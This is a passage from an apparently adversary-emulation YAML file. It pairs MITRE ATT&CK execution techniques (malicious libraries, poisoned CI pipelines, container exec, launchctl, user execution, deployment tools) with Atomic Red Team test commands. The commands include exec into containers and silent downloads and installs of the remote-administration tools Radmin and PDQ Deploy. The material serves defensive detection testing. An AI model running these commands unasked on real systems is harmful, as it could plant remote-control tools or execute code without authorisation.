Hidden in NPM. Retrieved May 22, 2025.
url: https://www.fortinet.com/blog/threat-research/malicious-packages-hiddin-in-npm
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-05-22T21:22:40.822Z'
name: Malicious Library
description: |-
Adversaries may rely on a user installing a malicious library to facilitate execution. Threat actors may [Upload Malware](https://attack.mitre.org/techniques/T1608/001) to package managers such as NPM and PyPi, as well as to public code repositories such as GitHub. User may install libraries without realizing they are malicious, thus bypassing techniques that specifically achieve Initial Access. This can lead to the execution of malicious code, such as code that establishes persistence, steals data, or mines cryptocurrency.(Citation: Datadog Security Labs Malicious PyPi Packages 2024)(Citation: Fortinet Malicious NPM Packages 2023)
In some cases, threat actors may compromise and backdoor existing popular libraries (i.e., [Compromise Software Dependencies and Development Tools](https://attack.mitre.org/techniques/T1195/001)). Alternatively, they may create entirely new packages and leverage behaviors such as typosquatting to encourage users to install them.
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: execution
x_mitre_attack_spec_version: 3.2.0
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Linux
- macOS
- Windows
x_mitre_version: '1.0'
x_mitre_remote_support: false
atomic_tests: []
T1677:
technique:
type: attack-pattern
spec_version: '2.1'
id: attack-pattern--7655ac3b-dfde-49c5-a967-242856174434
created: '2025-05-22T20:01:16.611Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
revoked: false
external_references:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1677
external_id: T1677
- source_name: Synactiv Hijacking GitHub Runners
description: Hugo Vincent. (2024, May 22). Hijacking GitHub runners to compromise
the organization. Retrieved May 22, 2025.
url: https://www.synacktiv.com/en/publications/hijacking-github-runners-to-compromise-the-organization
- source_name: GitHub Security Lab GitHub Actions Security 2021
description: 'Jaroslav Lobačevski. (2021, August 3). Keeping your GitHub Actions
and workflows secure Part 1: Preventing pwn requests. Retrieved May 22,
2025.'
url: https://securitylab.github.com/resources/github-actions-preventing-pwn-requests/
- source_name: GitHub Security Labs GitHub Actions Security Part 2 2021
description: 'Jaroslav Lobačevski. (2021, August 4). Keeping your GitHub Actions
and workflows secure Part 2: Untrusted input. Retrieved May 22, 2025.'
url: https://securitylab.github.com/resources/github-actions-untrusted-input/
- source_name: John Stawinski PyTorch Supply Chain Attack 2024
description: John Stawinski IV. (2024, January 11). Playing with Fire – How
We Executed a Critical Supply Chain Attack on PyTorch. Retrieved May 22,
2025.
url: https://johnstawinski.com/2024/01/11/playing-with-fire-how-we-executed-a-critical-supply-chain-attack-on-pytorch/
- source_name: Unit 42 Palo Alto GitHub Actions Supply Chain Attack 2025
description: 'Omer Gilm Aviad Hahami, Asi Greenholts, and Yaron Avital. (2025,
March 20). GitHub Actions Supply Chain Attack: A Targeted Attack on Coinbase
Expanded to the Widespread tj-actions/changed-files Incident: Threat Assessment
. Retrieved May 22, 2025.'
url: https://unit42.paloaltonetworks.com/github-actions-supply-chain-attack
- source_name: OWASP CICD-SEC-4
description: 'OWASP. (n.d.). CICD-SEC-4: Poisoned Pipeline Execution (PPE).
Retrieved May 22, 2025.'
url: https://owasp.org/www-project-top-10-ci-cd-security-risks/CICD-SEC-04-Poisoned-Pipeline-Execution
- source_name: Wiz Ultralytics AI Library Hijack 2024
description: Wiz Threat Research. (2024, December 9). Ultralytics AI Library
Hacked via GitHub for Cryptomining. Retrieved May 22, 2025.
url: https://www.wiz.io/blog/ultralytics-ai-library-hacked-via-github-for-cryptomining
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-10-21T02:38:29.636Z'
name: Poisoned Pipeline Execution
description: "Adversaries may manipulate continuous integration / continuous
development (CI/CD) processes by injecting malicious code into the build process.
There are several mechanisms for poisoning pipelines: \n\n* In a Direct
Pipeline Execution scenario, the threat actor directly modifies the CI
configuration file (e.g., `gitlab-ci.yml` in GitLab). They may include a command
to exfiltrate credentials leveraged in the build process to a remote server,
or to export them as a workflow artifact.(Citation: Unit 42 Palo Alto GitHub
Actions Supply Chain Attack 2025)(Citation: OWASP CICD-SEC-4)\n* In an Indirect
Pipeline Execution scenario, the threat actor injects malicious code into
files referenced by the CI configuration file. These may include makefiles,
scripts, unit tests, and linters.(Citation: OWASP CICD-SEC-4)\n* In a Public
Pipeline Execution scenario, the threat actor does not have direct access
to the repository but instead creates a malicious pull request from a fork
that triggers a part of the CI/CD pipeline. For example, in GitHub Actions,
the `pull_request_target` trigger allows workflows running from forked repositories
to access secrets. If this trigger is combined with an explicit pull request
checkout and a location for a threat actor to insert malicious code (e.g.,
an `npm build` command), a threat actor may be able to leak pipeline credentials.(Citation:
Unit 42 Palo Alto GitHub Actions Supply Chain Attack 2025)(Citation: GitHub
Security Lab GitHub Actions Security 2021) Similarly, threat actors may craft
pull requests with malicious inputs (such as branch names) if the build pipeline
treats those inputs as trusted.(Citation: Wiz Ultralytics AI Library Hijack
2024)(Citation: Synactiv Hijacking GitHub Runners)(Citation: GitHub Security
Labs GitHub Actions Security Part 2 2021) Finally, if a pipeline leverages
a self-hosted runner, a threat actor may be able to execute arbitrary code
on a host inside the organization’s network.(Citation: John Stawinski PyTorch
Supply Chain Attack 2024)\n\nBy poisoning CI/CD pipelines, threat actors may
be able to gain access to credentials, laterally move to additional hosts,
or input malicious components to be shipped further down the pipeline (i.e.,
[Supply Chain Compromise](https://attack.mitre.org/techniques/T1195)). "
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: execution
x_mitre_attack_spec_version: 3.3.0
x_mitre_contributors:
- Arun Seelagan, CISA
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: false
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- SaaS
x_mitre_version: '1.0'
x_mitre_remote_support: false
atomic_tests: []
T1609:
technique:
type: attack-pattern
spec_version: '2.1'
id: attack-pattern--7b50a1d3-4ca7-45d1-989d-a6503f04bfe1
created: '2021-03-29T16:39:26.183Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
revoked: false
external_references:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1609
external_id: T1609
- source_name: Docker Exec
description: Docker. (n.d.). Docker Exec. Retrieved March 29, 2021.
url: https://docs.docker.com/engine/reference/commandline/exec/
- source_name: Docker Entrypoint
description: Docker. (n.d.). Docker run reference. Retrieved March 29, 2021.
url: https://docs.docker.com/engine/reference/run/#entrypoint-default-command-to-execute-at-runtime
- source_name: Docker Daemon CLI
description: Docker. (n.d.). DockerD CLI. Retrieved March 29, 2021.
url: https://docs.docker.com/engine/reference/commandline/dockerd/
- source_name: Kubectl Exec Get Shell
description: The Kubernetes Authors. (n.d.). Get a Shell to a Running Container.
Retrieved March 29, 2021.
url: https://kubernetes.io/docs/tasks/debug-application-cluster/get-shell-running-container/
- source_name: Kubernetes Kubelet
description: The Kubernetes Authors. (n.d.). Kubelet. Retrieved March 29,
2021.
url: https://kubernetes.io/docs/reference/command-line-tools-reference/kubelet/
- source_name: Kubernetes API
description: The Kubernetes Authors. (n.d.). The Kubernetes API. Retrieved
March 29, 2021.
url: https://kubernetes.io/docs/concepts/overview/kubernetes-api/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-10-24T17:48:59.945Z'
name: Kubernetes Exec Into Container
description: |-
Adversaries may abuse a container administration service to execute commands within a container. A container administration service such as the Docker daemon, the Kubernetes API server, or the kubelet may allow remote management of containers within an environment.(Citation: Docker Daemon CLI)(Citation: Kubernetes API)(Citation: Kubernetes Kubelet)
In Docker, adversaries may specify an entrypoint during container deployment that executes a script or command, or they may use a command such as docker exec to execute a command within a running container.(Citation: Docker Entrypoint)(Citation: Docker Exec) In Kubernetes, if an adversary has sufficient permissions, they may gain remote execution in a container in the cluster via interaction with the Kubernetes API server, the kubelet, or by running a command such as kubectl exec.(Citation: Kubectl Exec Get Shell)
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: execution
x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Alfredo Oliveira, Trend Micro
- David Fiser, @anu4is, Trend Micro
- Brad Geesaman, @bradgeesaman
- Center for Threat-Informed Defense (CTID)
- Magno Logan, @magnologan, Trend Micro
- Vishwas Manral, McAfee
- Yossi Weizman, Azure Defender Research Team
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: false
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Containers
x_mitre_version: '1.3'
identifier: T1609
atomic_tests:
- name: ExecIntoContainer
auto_generated_guid: d03bfcd3-ed87-49c8-8880-44bb772dea4b
description: 'Attackers who have permissions, can run malicious commands in
containers in the cluster using exec command (“kubectl exec”). In this method,
attackers can use legitimate images, such as an OS image (e.g., Ubuntu) as
a backdoor container, and run their malicious code remotely by using “kubectl
exec”.
'
supported_platforms:
- containers
input_arguments:
namespace:
description: K8s namespace to use
type: string
default: default
command:
description: Command to run
type: string
default: uname
path:
description: Path to busybox.yaml file
type: string
default: "$PathtoAtomicsFolder/T1609/src/busybox.yaml"
dependencies:
- description: 'kubectl must be installed
'
get_prereq_command: 'echo "kubectl must be installed manually"
'
prereq_command: 'which kubectl
'
executor:
command: |
kubectl create -f #{path} -n #{namespace}
# wait 3 seconds for the instance to come up
sleep 3
kubectl exec -n #{namespace} busybox -- #{command}
cleanup_command: 'kubectl delete pod busybox -n #{namespace}
'
name: bash
elevation_required: false
- name: Docker Exec Into Container
auto_generated_guid: 900e2c49-221b-42ec-ae3c-4717e41e6219
description: 'Attackers who have permissions, can run malicious commands in
containers in the cluster using exec command (“docker exec”). In this method,
attackers can use legitimate images, such as an OS image (e.g., Ubuntu) as
a backdoor container, and run their malicious code remotely by using “docker
exec”. Kinsing (Golang-based malware) was executed with an Ubuntu container
entry point that runs shell scripts.
'
supported_platforms:
- containers
dependencies:
- description: 'docker must be installed
'
get_prereq_command: 'if [ "" == "`which docker`" ]; then echo "Docker Not
Found"; if [ -n "`which apt-get`" ]; then sudo apt-get -y install docker
; elif [ -n "`which yum`" ]; then sudo yum -y install docker ; fi ; else
echo "Docker installed"; fi
'
prereq_command: 'which docker
'
executor:
command: "docker build -t t1609 $PathtoAtomicsFolder/T1609/src/ \ndocker
run --name t1609_container --rm -itd t1609 bash /tmp/script.sh\ndocker exec
-i t1609_container bash -c \"cat /tmp/output.txt\"\n"
cleanup_command: "docker stop t1609_container\ndocker rmi -f t1609:latest
\n"
name: bash
elevation_required: false
T1569.001:
technique:
type: attack-pattern
spec_version: '2.1'
id: attack-pattern--810aa4ad-61c9-49cb-993f-daa06199421d
created: '2020-03-10T18:26:56.187Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
revoked: false
external_references:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1569/001
external_id: T1569.001
- source_name: Sofacy Komplex Trojan
description: Dani Creus, Tyler Halfpop, Robert Falcone. (2016, September 26).
Sofacy's 'Komplex' OS X Trojan. Retrieved July 8, 2017.
url: https://researchcenter.paloaltonetworks.com/2016/09/unit42-sofacys-komplex-os-x-trojan/
- source_name: 20 macOS Common Tools and Techniques
description: Phil Stokes. (2021, February 16). 20 Common Tools & Techniques
Used by macOS Threat Actors & Malware. Retrieved August 23, 2021.
url: https://labs.sentinelone.com/20-common-tools-techniques-used-by-macos-threat-actors-malware/
- source_name: Launchctl Man
description: SS64. (n.d.). launchctl. Retrieved March 28, 2020.
url: https://ss64.com/osx/launchctl.html
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-10-24T17:49:02.098Z'
name: 'System Services: Launchctl'
description: |
Adversaries may abuse launchctl to execute commands or programs. Launchctl interfaces with launchd, the service management framework for macOS. Launchctl supports taking subcommands on the command-line, interactively, or even redirected from standard input.(Citation: Launchctl Man)
Adversaries use launchctl to execute commands and programs as [Launch Agent](https://attack.mitre.org/techniques/T1543/001)s or [Launch Daemon](https://attack.mitre.org/techniques/T1543/004)s. Common subcommands include: launchctl load,launchctl unload, and launchctl start. Adversaries can use scripts or manually run the commands launchctl load -w "%s/Library/LaunchAgents/%s" or /bin/launchctl load to execute [Launch Agent](https://attack.mitre.org/techniques/T1543/001)s or [Launch Daemon](https://attack.mitre.org/techniques/T1543/004)s.(Citation: Sofacy Komplex Trojan)(Citation: 20 macOS Common Tools and Techniques)
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: execution
x_mitre_attack_spec_version: 3.2.0
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- macOS
x_mitre_version: '1.3'
identifier: T1569.001
atomic_tests:
- name: Launchctl
auto_generated_guid: 6fb61988-724e-4755-a595-07743749d4e2
description: 'Utilize launchctl
'
supported_platforms:
- macos
input_arguments:
executable_path:
description: Path of the executable to run.
type: path
default: "/System/Applications/Calculator.app/Contents/MacOS/Calculator"
label_name:
description: Unique label to assign this job to launchd.
type: string
default: evil
executor:
command: 'launchctl submit -l #{label_name} -- #{executable_path}
'
cleanup_command: 'launchctl remove #{label_name}
'
name: bash
T1059.008:
technique:
type: attack-pattern
spec_version: '2.1'
id: attack-pattern--818302b2-d640-477b-bf88-873120ce85c4
created: '2020-10-20T00:09:33.072Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
revoked: false
external_references:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1059/008
external_id: T1059.008
- source_name: Cisco IOS Software Integrity Assurance - Command History
description: Cisco. (n.d.). Cisco IOS Software Integrity Assurance - Command
History. Retrieved October 21, 2020.
url: https://tools.cisco.com/security/center/resources/integrity_assurance.html#23
- source_name: Cisco Synful Knock Evolution
description: Graham Holmes. (2015, October 8). Evolution of attacks on Cisco
IOS devices. Retrieved October 19, 2020.
url: https://blogs.cisco.com/security/evolution-of-attacks-on-cisco-ios-devices
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-10-24T17:49:02.287Z'
name: Network Device CLI
description: "Adversaries may abuse scripting or built-in command line interpreters
(CLI) on network devices to execute malicious command and payloads. The CLI
is the primary means through which users and administrators interact with
the device in order to view system information, modify device operations,
or perform diagnostic and administrative functions. CLIs typically contain
various permission levels required for different commands. \n\nScripting interpreters
automate tasks and extend functionality beyond the command set included in
the network OS. The CLI and scripting interpreter are accessible through a
direct console connection, or through remote means, such as telnet or [SSH](https://attack.mitre.org/techniques/T1021/004).\n\nAdversaries
can use the network CLI to change how network devices behave and operate.
The CLI may be used to manipulate traffic flows to intercept or manipulate
data, modify startup configuration parameters to load malicious system software,
or to disable security features or logging to avoid detection.(Citation: Cisco
Synful Knock Evolution)"
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: execution
x_mitre_attack_spec_version: 3.2.0
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Network Devices
x_mitre_version: '1.2'
atomic_tests: []
T1559.003:
technique:
type: attack-pattern
spec_version: '2.1'
id: attack-pattern--8252f135-ed26-4ce1-ae61-f26e94429a19
created: '2021-10-12T06:45:36.763Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
revoked: false
external_references:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1559/003
external_id: T1559.003
- source_name: creatingXPCservices
description: Apple. (2016, September 9). Creating XPC Services. Retrieved
April 19, 2022.
url: https://developer.apple.com/library/archive/documentation/MacOSX/Conceptual/BPSystemStartup/Chapters/CreatingXPCServices.html#//apple_ref/doc/uid/10000172i-SW6-SW1
- source_name: Designing Daemons Apple Dev
description: Apple. (n.d.). Retrieved October 12, 2021.
url: https://developer.apple.com/library/archive/documentation/MacOSX/Conceptual/BPSystemStartup/Chapters/DesigningDaemons.html
- source_name: CVMServer Vuln
description: 'Mickey Jin. (2021, June 3). CVE-2021-30724: CVMServer Vulnerability
in macOS and iOS. Retrieved October 12, 2021.'
url: https://www.trendmicro.com/en_us/research/21/f/CVE-2021-30724_CVMServer_Vulnerability_in_macOS_and_iOS.html
- source_name: Learn XPC Exploitation
description: Wojciech Reguła. (2020, June 29). Learn XPC exploitation. Retrieved
October 12, 2021.
url: https://wojciechregula.blog/post/learn-xpc-exploitation-part-3-code-injections/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-04-15T19:58:47.031Z'
name: XPC Services
description: |-
Adversaries can provide malicious content to an XPC service daemon for local code execution. macOS uses XPC services for basic inter-process communication between various processes, such as between the XPC Service daemon and third-party application privileged helper tools. Applications can send messages to the XPC Service daemon, which runs as root, using the low-level XPC Service C API or the high level NSXPCConnection API in order to handle tasks that require elevated privileges (such as network connections). Applications are responsible for providing the protocol definition which serves as a blueprint of the XPC services. Developers typically use XPC Services to provide applications stability and privilege separation between the application client and the daemon.(Citation: creatingXPCservices)(Citation: Designing Daemons Apple Dev)
Adversaries can abuse XPC services to execute malicious content. Requests for malicious execution can be passed through the application's XPC Services handler.(Citation: CVMServer Vuln)(Citation: Learn XPC Exploitation) This may also include identifying and abusing improper XPC client validation and/or poor sanitization of input parameters to conduct [Exploitation for Privilege Escalation](https://attack.mitre.org/techniques/T1068).
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: execution
x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Csaba Fitzl @theevilbit of Kandji
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- macOS
x_mitre_version: '1.1'
atomic_tests: []
T1204:
technique:
type: attack-pattern
spec_version: '2.1'
id: attack-pattern--8c32eb4d-805f-4fc5-bf60-c4d476c131b5
created: '2018-04-18T17:59:24.739Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
revoked: false
external_references:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1204
external_id: T1204
- source_name: Krebs Discord Bookmarks 2023
description: Brian Krebs. (2023, May 30). Discord Admins Hacked by Malicious
Bookmarks. Retrieved January 2, 2024.
url: https://krebsonsecurity.com/2023/05/discord-admins-hacked-by-malicious-bookmarks/
- source_name: Reliaquest-execution
description: Reliaquest. (2024, May 31). New Execution Technique in ClearFake
Campaign. Retrieved August 2, 2024.
url: https://www.reliaquest.com/blog/new-execution-technique-in-clearfake-campaign/
- source_name: Telephone Attack Delivery
description: 'Selena Larson, Sam Scholten, Timothy Kromphardt. (2021, November
4). Caught Beneath the Landline: A 411 on Telephone Oriented Attack Delivery.
Retrieved January 5, 2022.'
url: https://www.proofpoint.com/us/blog/threat-insight/caught-beneath-landline-411-telephone-oriented-attack-delivery
- source_name: Talos Roblox Scam 2023
description: Tiago Pereira. (2023, November 2). Attackers use JavaScript URLs,
API forms and more to scam users in popular online game “Roblox”. Retrieved
January 2, 2024.
url: https://blog.talosintelligence.com/roblox-scam-overview/
- source_name: proofpoint-selfpwn
description: 'Tommy Madjar, Dusty Miller, Selena Larson. (2024, June 17).
From Clipboard to Compromise: A PowerShell Self-Pwn. Retrieved August 2,
2024.'
url: https://www.proofpoint.com/us/blog/threat-insight/clipboard-compromise-powershell-self-pwn
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-10-24T17:49:04.940Z'
name: User Execution
description: |-
An adversary may rely upon specific actions by a user in order to gain execution. Users may be subjected to social engineering to get them to execute malicious code by, for example, opening a malicious document file or link. These user actions will typically be observed as follow-on behavior from forms of [Phishing](https://attack.mitre.org/techniques/T1566).
While [User Execution](https://attack.mitre.org/techniques/T1204) frequently occurs shortly after Initial Access it may occur at other phases of an intrusion, such as when an adversary places a file in a shared directory or on a user's desktop hoping that a user will click on it. This activity may also be seen shortly after [Internal Spearphishing](https://attack.mitre.org/techniques/T1534).
Adversaries may also deceive users into performing actions such as:
* Enabling [Remote Access Tools](https://attack.mitre.org/techniques/T1219), allowing direct control of the system to the adversary
* Running malicious JavaScript in their browser, allowing adversaries to [Steal Web Session Cookie](https://attack.mitre.org/techniques/T1539)s(Citation: Talos Roblox Scam 2023)(Citation: Krebs Discord Bookmarks 2023)
* Downloading and executing malware for [User Execution](https://attack.mitre.org/techniques/T1204)
* Coerceing users to copy, paste, and execute malicious code manually(Citation: Reliaquest-execution)(Citation: proofpoint-selfpwn)
For example, tech support scams can be facilitated through [Phishing](https://attack.mitre.org/techniques/T1566), vishing, or various forms of user interaction. Adversaries can use a combination of these methods, such as spoofing and promoting toll-free numbers or call centers that are used to direct victims to malicious websites, to deliver and execute payloads containing malware or [Remote Access Tools](https://attack.mitre.org/techniques/T1219).(Citation: Telephone Attack Delivery)
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: execution
x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Oleg Skulkin, Group-IB
- Menachem Goldstein
- Harikrishnan Muthu, Cyble
- ReliaQuest
- Ale Houspanossian
- Fernando Bacchin
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: false
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Linux
- Windows
- macOS
- IaaS
- Containers
x_mitre_version: '1.8'
atomic_tests: []
T1072:
technique:
type: attack-pattern
spec_version: '2.1'
id: attack-pattern--92a78814-b191-47ca-909c-1ccfe3777414
created: '2017-05-31T21:30:57.201Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
revoked: false
external_references:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1072
external_id: T1072
- source_name: Fortinet Zero-Day and Custom Malware Used by Suspected Chinese
Actor in Espionage Operation
description: ALEXANDER MARVI, BRAD SLAYBAUGH, DAN EBREO, TUFAIL AHMED, MUHAMMAD
UMAIR, TINA JOHNSON. (2023, March 16). Fortinet Zero-Day and Custom Malware
Used by Suspected Chinese Actor in Espionage Operation. Retrieved May 15,
2023.
url: https://www.mandiant.com/resources/blog/fortinet-malware-ecosystem
- source_name: SpecterOps Lateral Movement from Azure to On-Prem AD 2020
description: 'Andy Robbins. (2020, August 17). Death from Above: Lateral Movement
from Azure to On-Prem AD. Retrieved March 13, 2023.'
url: https://posts.specterops.io/death-from-above-lateral-movement-from-azure-to-on-prem-ad-d18cb3959d4d
- source_name: 'Mitiga Security Advisory: SSM Agent as Remote Access Trojan'
description: 'Ariel Szarf, Or Aspir. (n.d.). Mitiga Security Advisory: Abusing
the SSM Agent as a Remote Access Trojan. Retrieved January 31, 2024.'
url: https://www.mitiga.io/blog/mitiga-security-advisory-abusing-the-ssm-agent-as-a-remote-access-trojan
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-10-24T17:49:06.595Z'
name: Software Deployment Tools
description: "Adversaries may gain access to and use centralized software suites
installed within an enterprise to execute commands and move laterally through
the network. Configuration management and software deployment applications
may be used in an enterprise network or cloud environment for routine administration
purposes. These systems may also be integrated into CI/CD pipelines. Examples
of such solutions include: SCCM, HBSS, Altiris, AWS Systems Manager, Microsoft
Intune, Azure Arc, and GCP Deployment Manager. \n\nAccess to network-wide
or enterprise-wide endpoint management software may enable an adversary to
achieve remote code execution on all connected systems. The access may be
used to laterally move to other systems, gather information, or cause a specific
effect, such as wiping the hard drives on all endpoints.\n\nSaaS-based configuration
management services may allow for broad [Cloud Administration Command](https://attack.mitre.org/techniques/T1651)
on cloud-hosted instances, as well as the execution of arbitrary commands
on on-premises endpoints. For example, Microsoft Configuration Manager allows
Global or Intune Administrators to run scripts as SYSTEM on on-premises devices
joined to Entra ID.(Citation: SpecterOps Lateral Movement from Azure to On-Prem
AD 2020) Such services may also utilize [Web Protocols](https://attack.mitre.org/techniques/T1071/001)
to communicate back to adversary owned infrastructure.(Citation: Mitiga Security
Advisory: SSM Agent as Remote Access Trojan)\n\nNetwork infrastructure devices
may also have configuration management tools that can be similarly abused
by adversaries.(Citation: Fortinet Zero-Day and Custom Malware Used by Suspected
Chinese Actor in Espionage Operation)\n\nThe permissions required for this
action vary by system configuration; local credentials may be sufficient with
direct access to the third-party system, or specific domain credentials may
be required. However, the system may require an administrative account to
log in or to access specific functionality."
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: execution
- kill_chain_name: mitre-attack
phase_name: lateral-movement
x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Shane Tully, @securitygypsy
- Joe Gumke, U.S. Bank
- Tamir Yehuda
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: false
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Linux
- macOS
- Network Devices
- SaaS
- Windows
x_mitre_version: '3.2'
x_mitre_remote_support: false
identifier: T1072
atomic_tests:
- name: Radmin Viewer Utility
auto_generated_guid: b4988cad-6ed2-434d-ace5-ea2670782129
description: 'An adversary may use Radmin Viewer Utility to remotely control
Windows device, this will start the radmin console.
'
supported_platforms:
- windows
input_arguments:
radmin_installer:
description: Radmin Viewer installer
type: path
default: RadminViewer.msi
radmin_exe:
description: The radmin.exe executable from RadminViewer.msi
type: path
default: Radmin Viewer 3/Radmin.exe
dependency_executor_name: powershell
dependencies:
- description: 'Radmin Viewer Utility must be installed at specified location
(#{radmin_exe})
'
prereq_command: 'if (Test-Path "${env:ProgramFiles(x86)}/#{radmin_exe}") {exit
0} else {exit 1}
'
get_prereq_command: |
Write-Host Downloading radmin installer
New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
Invoke-WebRequest "https://www.radmin.com/download/Radmin_Viewer_3.5.2.1_EN.msi" -OutFile "PathToAtomicsFolder\..\ExternalPayloads\#{radmin_installer}"
Write-Host Install Radmin
Start-Process msiexec -Wait -ArgumentList /i , "PathToAtomicsFolder\..\ExternalPayloads\#{radmin_installer}", /qn
executor:
name: command_prompt
elevation_required: true
command: '"%PROGRAMFILES(x86)%/#{radmin_exe}"
'
- name: PDQ Deploy RAT
auto_generated_guid: e447b83b-a698-4feb-bed1-a7aaf45c3443
description: 'An adversary may use PDQ Deploy Software to deploy the Remote
Adminstartion Tool, this will start the PDQ console.
'
supported_platforms:
- windows
input_arguments:
PDQ_Deploy_installer:
description: PDQ Deploy Install
type: path
default: PDQDeploysetup.exe
PDQ_Deploy_exe:
description: The PDQDeployConsole.exe executable from PDQDeploysetup.exe
type: path
default: Admin Arsenal/PDQ Deploy/PDQDeployConsole.exe
dependency_executor_name: powershell
dependencies:
- description: 'PDQ Deploy will be installed at specified location (#{PDQ_Deploy_exe})
'
prereq_command: 'if (Test-Path "${env:ProgramFiles(x86)}/#{PDQ_Deploy_exe}")
{exit 0} else {exit 1}
'
get_prereq_command: |
Write-Host Downloading PDQ Deploy installer
New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
Invoke-WebRequest "https://download.pdq.com/release/19/Deploy_19.3.350.0.exe" -OutFile "PathToAtomicsFolder\..\ExternalPayloads\#{PDQ_Deploy_installer}"
Write-Host Install PDQ Deploy
Start-Process "PathToAtomicsFolder\..\ExternalPayloads\#{PDQ_Deploy_installer}" -Wait -ArgumentList "/s"
executor:
name: command_prompt
elevation_required: true
command: '"%PROGRAMFILES(x86)%/#{PDQ_Deploy_exe}"
'
- name: Deploy 7-Zip Using Chocolatey
auto_generated_guid: 2169e8b0-2ee7-44cb-8a6e-d816a5db7d8a
description: 'An adversary may use Chocolatey to remotely deploy the 7-Zip file
archiver utility.
'
supported_platforms:
- windows
dependency_executor_name: powershell
dependencies:
- description: 'Chocolatey must be installed to deploy 7-Zip.
'
prereq_command: 'if (Test-Path "${env:ProgramFiles(x86)}\Chocolatey\choco.exe")
{exit 0} else {exit 1}
'
get_prereq_command: |
Write-Host Downloading Chocolatey installer
Invoke-WebRequest -Uri "https://chocolatey.org/install.ps1" -OutFile "chocolatey-install.ps1"
Write-Host Installing Chocolatey
Start-Process -FilePath "powershell.exe" -ArgumentList "-NoProfile -ExecutionPolicy Bypass -File chocolatey-install.ps1" -Wait
executor:
name: powershell
elevation_required: false
command: |
# Deploy 7-Zip using Chocolatey
choco install -y 7zip
T1059.001:
technique:
type: attack-pattern
spec_version: '2.1'
id: attack-pattern--970a3432-3237-47ad-bcca-7d8cbb217736
created: '2020-03-09T13:48:55.078Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
revoked: false
external_references:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1059/001
external_id: T1059.001
- source_name: Microsoft PSfromCsharp APR 2014
description: Babinec, K. (2014, April 28). Executing PowerShell scripts from
C#. Retrieved April 22, 2019.
url: https://blogs.msdn.microsoft.com/kebab/2014/04/28/executing-powershell-scripts-from-c/
